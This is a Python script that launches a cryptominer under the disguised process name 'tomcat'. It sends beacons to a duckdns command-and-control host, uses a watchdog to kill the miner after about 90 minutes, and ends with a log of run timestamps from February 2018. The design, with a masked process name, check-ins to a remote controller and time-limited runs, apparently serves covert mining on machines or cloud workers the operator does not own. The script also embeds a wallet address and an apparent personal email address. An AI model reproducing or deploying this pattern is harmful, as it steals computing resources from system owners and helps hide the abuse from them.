import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:08.100999
#2018-02-17 16:43:05.307656
#2018-02-17 18:31:01.488640
#2018-02-17 20:19:03.825414
#2018-02-17 22:06:04.584414
#2018-02-17 23:49:07.229510
#2018-02-18 01:40:07.337610
#2018-02-18 03:26:07.293578
#2018-02-18 05:15:06.355772
#2018-02-18 07:07:01.437230
#2018-02-18 08:55:02.009971
#2018-02-18 10:42:04.777951
#2018-02-18 12:27:03.510044
#2018-02-18 14:15:04.860097
#2018-02-18 16:07:06.140056
#2018-02-18 17:55:05.227029
#2018-02-18 19:41:05.847112
#2018-02-18 21:26:05.859278
#2018-02-18 23:15:05.468531
#2018-02-19 01:02:04.501366
#2018-02-19 02:48:07.762384
#2018-02-19 04:34:05.374090
#2018-02-19 06:19:06.689981
#2018-02-19 08:07:06.430407
#2018-02-19 09:57:01.247072
#2018-02-19 11:46:09.442173
#2018-02-19 13:31:08.125372
#2018-02-19 15:20:01.323280
#2018-02-19 17:08:05.922853
#2018-02-19 18:56:01.523341
#2018-02-19 20:41:05.505608
#2018-02-19 22:27:07.370415
#2018-02-20 00:13:05.132996
#2018-02-20 02:01:01.520098
#2018-02-20 03:51:02.009647
#2018-02-20 05:35:07.056918
#2018-02-20 07:19:03.840061
#2018-02-20 09:05:03.681514
#2018-02-20 10:48:04.344288
#2018-02-20 12:34:09.381033
#2018-02-20 14:24:01.733033
#2018-02-20 16:08:01.423132
#2018-02-20 17:55:10.628175
#2018-02-20 19:46:04.745857
#2018-02-20 21:36:01.945506
#2018-02-20 23:18:05.723445
#2018-02-21 01:04:01.938411
#2018-02-21 02:50:07.682860
#2018-02-21 04:39:07.167731
#2018-02-21 06:28:01.711054
#2018-02-21 08:13:06.722850
#2018-02-21 10:00:11.159147
#2018-02-21 11:47:07.898076
#2018-02-21 13:38:06.842892
#2018-02-21 15:22:01.458399
#2018-02-21 17:12:06.272530
#2018-02-21 19:01:07.484232
#2018-02-21 20:49:06.424609
#2018-02-21 22:33:03.908653
#2018-02-22 00:23:04.168573
#2018-02-22 02:10:05.089767
#2018-02-22 03:56:05.646591
#2018-02-22 05:43:03.915381
#2018-02-22 07:28:05.081109
#2018-02-22 09:16:01.348961
#2018-02-22 11:04:04.233079
#2018-02-22 12:51:02.208673
#2018-02-22 14:37:04.424288
#2018-02-22 16:24:01.802292
#2018-02-22 18:10:12.946317
#2018-02-22 19:58:07.126291
#2018-02-22 21:47:05.391509
#2018-02-22 23:35:08.391605
#2018-02-23 01:23:03.336480
#2018-02-23 03:09:05.634734
#2018-02-23 04:56:03.969397
#2018-02-23 06:40:10.015434
#2018-02-23 08:29:06.777739
#2018-02-23 10:44:04.163882
#2018-02-23 12:41:03.406864
#2018-02-23 14:26:09.732788
#2018-02-23 16:16:08.171030
#2018-02-23 18:01:10.298898
#2018-02-23 19:46:06.335179
#2018-02-23 21:28:01.562981
#2018-02-23 23:16:05.916444
#2018-02-24 01:07:06.523830
#2018-02-24 02:57:07.521896
#2018-02-24 04:45:06.948795
#2018-02-24 06:29:01.732128
#2018-02-24 08:17:05.537143
#2018-02-24 10:02:07.202832
#2018-02-24 12:01:01.941016
#2018-02-24 13:48:06.048391
#2018-02-24 15:39:01.747514
#2018-02-24 17:33:01.784976
#2018-02-24 19:19:06.944311
#2018-02-24 21:09:06.643129
#2018-02-25 01:20:06.593767
#2018-02-25 05:23:01.485139
#2018-02-25 11:34:06.526969